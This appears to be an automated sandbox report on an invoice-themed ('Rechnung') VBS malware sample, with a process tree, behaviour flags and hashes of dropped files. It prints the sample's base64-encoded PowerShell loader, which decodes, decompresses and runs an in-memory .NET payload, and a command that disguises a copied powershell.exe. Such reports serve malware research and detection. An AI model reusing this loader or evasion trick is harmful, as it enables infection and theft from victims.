C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:13⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:13⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,17364977694925434313,11620856302311152609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5300
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:708
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5544
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\" -spe -an -ai#7zMap20409:130:7zEvent95001⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5852
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs1⤵PID:5652
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs"1⤵
- Checks computer location settings
- Modifies registry class
PID:5720 -
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs.exe"C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs.exe" -enc JABMAHcAZQBlAGcAagBqAGIAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABXAGsAZwBtAHcAawAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEwAdwBlAGUAZwBqAGoAYgBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBrAGcAbQB3AGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAFAAeAB6AHgAcgBrAGYAcQBiAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAApADsAJABLAGwAawBwAHUAZQBwAGMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQARwBhAGkAdQBsACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFAAeAB6AHgAcgBrAGYAcQBiAG4ALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAYQBpAHUAbAAuAEMAbwBwAHkAVABvACgAIAAkAEsAbABrAHAAdQBlAHAAYwBmACAAKQA7ACQARwBhAGkAdQBsAC4AQwBsAG8AcwBlACgAKQA7ACQAUAB4AHoAeAByAGsAZgBxAGIAbgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAJABLAGwAawBwAHUAZQBwAGMAZgAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAEcAdQB2AGoAZwBvAHAAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAE8AcABkAGQAawAgAD0AIAAkAEcAdQB2AGoAZwBvAHAALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABPAHAAZABkAGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAE8AcABkAGQAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5876
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:3192
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD56b94d508dd3affc28089c715d96c1a47
SHA1938e3ebd1bf00404b51f30656d5e0a055e9bdd76
SHA2561685faff3fc702df88da03fcfc1e560227e3c88f7870d2ed82440614bc336a95
SHA5120a68f4fb67daca4816679317423a66fc4bbac6de04869ec47444b55be76bd9dec81b1c8636a0baa8cce8716f29c48d8216ee8f58e273b88fed1cb2584ba6f265
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize471B
MD5d4a12f78da45284fb3aae03da640ccba
SHA1b249a7866b44db669e8f0b1fdc4e0069e3037e43
SHA256fbee27a460a30e49e932cda67f938c1b1fb23bf49bd91bfed7e7e4388980e79a
SHA512ffb410a3b90631e51bfbad591d21fdae22f514f46d47cf0f46fb3ccd7dbf837c293a5d7f92b8acda6594235813e8eb08052e3a5ba7426ad6b21d3da0f0c770b4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize400B
MD59ce04f8d36d8a756893b35e6b18bb422
SHA129b6b5956ec8a7f2c774b20f67a65d65aa701cd9
SHA2560acb71e39849d5ecc959112b298dc187bc04e7e54e33d99fdd3a09bc05c48c56
SHA512df363723af6ed825a38c4361abf4bf3bcb752a5040797c571beb4496aa21ff52bfe009efcce6fc2ef9c482a39e6868f45db0469d8932b8d58e03258cb88cb221
-
Filesize
152B
MD5f426165d1e5f7df1b7a3758c306cd4ae
SHA159ef728fbbb5c4197600f61daec48556fec651c1
SHA256b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841
SHA5128d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6
-
Filesize
152B
MD56960857d16aadfa79d36df8ebbf0e423
SHA1e1db43bd478274366621a8c6497e270d46c6ed4f
SHA256f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32
SHA5126deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe
-
Filesize
244B
MD50ce09d7c4c06e10943018408e7a01fbe
SHA1d3ffcbfd1857abdfd7cce4b49fa5996e1e5c1eb2
SHA25652e41a812d3d7b5c5245220bbe867d906593c0c6354d817b76788604973bdc0a
SHA51215d75498f340aa913d9e6c877a6cf44bdacd254ace4cfb557cec8f59673adddd246f96237d5299b9aeaf7adde9e3d54e60762b739c91a080ff59df9357494cd5
-
Filesize
7KB
MD5bc20f61f426ef72380cf7a56cc638417
SHA1689408222e3b7cceb61940f7a7069b3b6bcd6d34
SHA2566479dc19bc08ca1476e7ba0e76939cb2ff3f90ccca1290f71c20993a8f8acdda
SHA512459af0ddf4327e5079d217f061941f9eda72a6583036db9ac8d298b64fc9f1849433efa0ac03174ae01b87d3ad34fb73e817ca7a40c13348166205d57e4cb452
-
Filesize
6KB
MD54f3f21f216e1bde8d203fdad7f15bb4a
SHA11f767006143ae9c3da3ff45a1d82c2b7e696172f
SHA256c447a7a0a36b69ff4d633703bc3a115b10169588448f806c58e890b7d14e12e3
SHA51241a143c912f64ff0bfad795cf112aeba49852f5deea7a8fb56d28906beeeb4a9c21328fd56edb71b8413c1a51ab441c72116a8d48973179ef9dec34973915d81
-
Filesize
6KB
MD5ef359ae27855d8e1fb0265b53f67a68c
SHA129d9a1d3bf35b4015772fa312fcad07c08864bc8
SHA25602f76af73fb7b2814ba72ef6f7781e97fa6dc1acac16ef5a9adb3cf71b815369
SHA512a2de7ca8bd83f125d1bc79da8ad2e0a9b665581c8edf8d4024ce1fdcb757f3fc8a1ad728acc227f859854e17142f580b642407f9dd46ad04409f40abb44ee821
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5d2c5a2c1a18f59c3652120f94832c2ba
SHA1059a4e522860944e17ed0d3bf0085e3fdfb3c20c
SHA256a990767e4a39306b2502d1d7fe6f57ed20099da6534ee4841f943842ead71a72
SHA512310ed796f48c9df8945f712242a32b669a85c499c6fddff6af097e0bb3207f71c0b5c479a45ece1a2af39cf7c9793d6b1876cbdde24b107a5c7e7e05a6f7f067
-
Filesize
10KB
MD5cfb14cf4ac476b735d9c4ded9248eb0e
SHA11218647752f892c79613b6b231d42f3d9e80ffae
SHA256fb962d3dc1d8d573f7f6b300efec371720298a2ad4d87e2702530945932249bf
SHA5124958d0d1a0f8ea8f0261aa8c8b474853b92bdbbcc3473dc26c5bd882df23369fd6f92f191edebed190b1b49f72051a3d01acd65918e828520fd8ba9cd8cb1950
-
Filesize
11KB
MD58e857581bfc5413e3f6bc5f7b69977e0
SHA18fcda4e5cacda4c4e2612bd5e8aab3be9962e46a
SHA2561b915f2d2c8f79a04a6df367380d99df523c9457b057c8a0080b30126fe5f59b
SHA5124232ddc783ef460504f9940d56e0915ae5fe85cc15673d83879042bc1df76eca82ed4b61668c4eebcd5ca24e0bf79bb6683744dd9598b414263a0174d4d3e6a0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Managed\hgfs.dll
Filesize89KB
MD5a3ffaec3fd51d8bbf4c5f1575100b856
SHA1a7dbe003681b48c6075cdae3d4ff2dcbeb51311f
SHA256ff63474af99de3c2558228551cf869f01d77f96617cd40ef965691b984b96002
SHA51212197073f3c6f3475efc3ea1bb32958e37803e4be9ed0199bfe65cdbd458a73d95037c03ce6894624abcd37618f36ab4e8614df1cbca799caa5f17808440f5f5
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\cardigan.mpeg
Filesize878KB
MD5dc93cc9611ad0f3955d945cb9fe49a2f
SHA14097a79a913448879ed22f79524fd0bc2fc4d542
SHA2565f258c49d628f1feae9a2e6c446f2ea785c329f86705a324e0d077e832132d88
SHA5127e84542818e10baafbd07b13ca99f1f183e871acd276a67cd9d09b3e99b7d57ab86590e8d005a8c623b6b4a79baf2be34e7977af3eed85a4e223dec78ec10fd5
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\glib-2.0.dll
Filesize1.0MB
MD52c86ec2ba23eb138528d70eef98e9aaf
SHA1246846a3fe46df492f0887a31f7d52aae4faa71a
SHA256030983470da06708cc55fd6aca92df199a051922b580db5db55c8cb6b203b51b
SHA512396a3883fa65d7c3a0af7d607001a6099316a85563147cb34fa9806c9a4b39cfa90c7fa9eb4456399977eb47438d10896d25ed5327ae7aa3e3ae28cd1d13701c
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\msvcr90.dll
Filesize638KB
MD511d49148a302de4104ded6a92b78b0ed
SHA1fd58a091b39ed52611ade20a782ef58ac33012af
SHA256ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0
SHA512fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\sqlite.dll
Filesize243KB
MD596ea9810b13ae107a3efbc44452f1ddf
SHA1e4db1816f5a16f1ff4b8b90453a875a9c3aed3ea
SHA256794a456a593e50ecdbdb1c08687d9db7724db2597889883e9a32ee11ba0166cd
SHA5120ff49e5112bd48eed297554f0d971ab07266564f6bcc80bfa7dbb66629579f4f8bb5509c4390714990e8c5d7dfea261a5626a117c3061c66424879b0b6ea69a2
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\toparch.svg
Filesize1.2MB
MD55b23b0752f582a7ea16296a9238a568a
SHA1aebd7767b37a28d5eaab02f4b5f7e982441f9269
SHA25696d8470b767bce6fbc71e55c2c43980da104f9532f941e25e30ae3c8fb7b63e6
SHA5125f7a7d287916ba99acfabd074576f7d2db585d594e202739d2cd492b679ba1899cdc27c7c744f8314f6cf030f6d9ca7a841e7fea68e00bee7757b353d0eca330
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Plugins\vcruntime140.dll
Filesize106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Resources\msvcp90.dll
Filesize557KB
MD590a32d8e07f7fb3d102eab1da28f0723
SHA10903911bbb5d00f68ba51895fa898b38a5453ded
SHA256004ed24507dc7307cec1a3732fa57eabf19e918c3e1b54561e6cc01f554c0b77
SHA5122c69586d5c5d2b4b5decf2bf479554c3d0ff5f5a6fbacb01b8583ea8d96d0ae9c850c30a0d43eb2ad1116be901578d15fe08fce3e505440c854082c208a79f1a
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\Resources\vcruntime140_1.dll
Filesize48KB
MD5cf0a1c4776ffe23ada5e570fc36e39fe
SHA12050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA2566fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\level4.resS
Filesize128KB
MD564d183ad524dfcd10a7c816fbca3333d
SHA15a180d5c1f42a0deaf475b7390755b3c0ecc951c
SHA2565a666340f42f0f985772024d90a83d15c9a241a68d58205cd4afbb1a31f1621a
SHA5123cab59dff09981f49d1070fba06a781439bb1ea2dae0cfcb937d9875bbe9e866be2c951cfc6a3ca4a92aea79dd3e9c4792a765f5a06f230a57dabcab2f0b3c1e
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\Data\mozglue.dll
Filesize222KB
MD5536f3db0935e8a3e4a946cda6f641213
SHA10d59a21a15e3d7fdaed9549cae0d69b9bff3a1a3
SHA2563a8263b607897e6754604e08b62b088ab2443df57146dee8f709193c454cd573
SHA512016646f745d6ce3fa2e600dd3131805b7a0b1171fd5f59f53b9582128297c3a9bcd8ea20020fc1c2953f2cfe96b2e70d56a824b9e2bc2fc11422aec9243e66d4
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\app.asar.unpacked\chronicle.svg
Filesize901KB
MD5f5287c9ac6523fa9afc2096a5bcea901
SHA1d9f5b46a8525ef7e90e9446a3b750677e5018718
SHA256518bc674a4855d72a0163972be3e9776358dd2806e69ff5c846efc8424c4463d
SHA512450bf0347f5098279bdb3b1f76951039bf59884d96107541e37ef3b3d3dd52bb1d3cf54451f8209ee6be79096bf6282fa0479f492e7e2a6dfa93a3c296b76bd6
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\app.asar.unpacked\msvcp140.dll
Filesize564KB
MD51ba6d1cf0508775096f9e121a24e5863
SHA1df552810d779476610da3c8b956cc921ed6c91ae
SHA25674892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA5129887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\10095043992995285637\resources\vmtools.dll
Filesize617KB
MD565c3c2a741838474a592679cda346753
SHA1043d80766dd4e49d8dca6ac72b04e09b5491fdc9
SHA2564e5f2c54d9ecfe48999edfcce0de038948f8b20ff68e299c55d9a2d6f65713e8
SHA512e5d8b308586ffa914f46b6766217eb12ad759853d25108db06170b870d0e8947e2befabc2843f76cb864b0f0135a8f2163b7c93fe644b293789919d1d07c4079
-
Filesize
1.6MB
MD5ef631a2d714c4ea5480e40163f23344f
SHA15a32baa3072836e76ea12006fb9a9d69ec10a6f3
SHA25643f335930a2bb9df1e30bd3e8e10cab5bc4cd23c31b2db740c9649596821b4f1
SHA51278c078d20091344c0efd0e740e1045454e3b261318c1eb9056f51ec82abec8a99b21194fb7a096d350ec23f76a1719501694d4b2bf5801903635d62c1cafe703
-
C:\Users\Admin\Downloads\Rechnung01920-10095043992995285637\Rechnung01920-10095043992995285637.vbs.exe
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc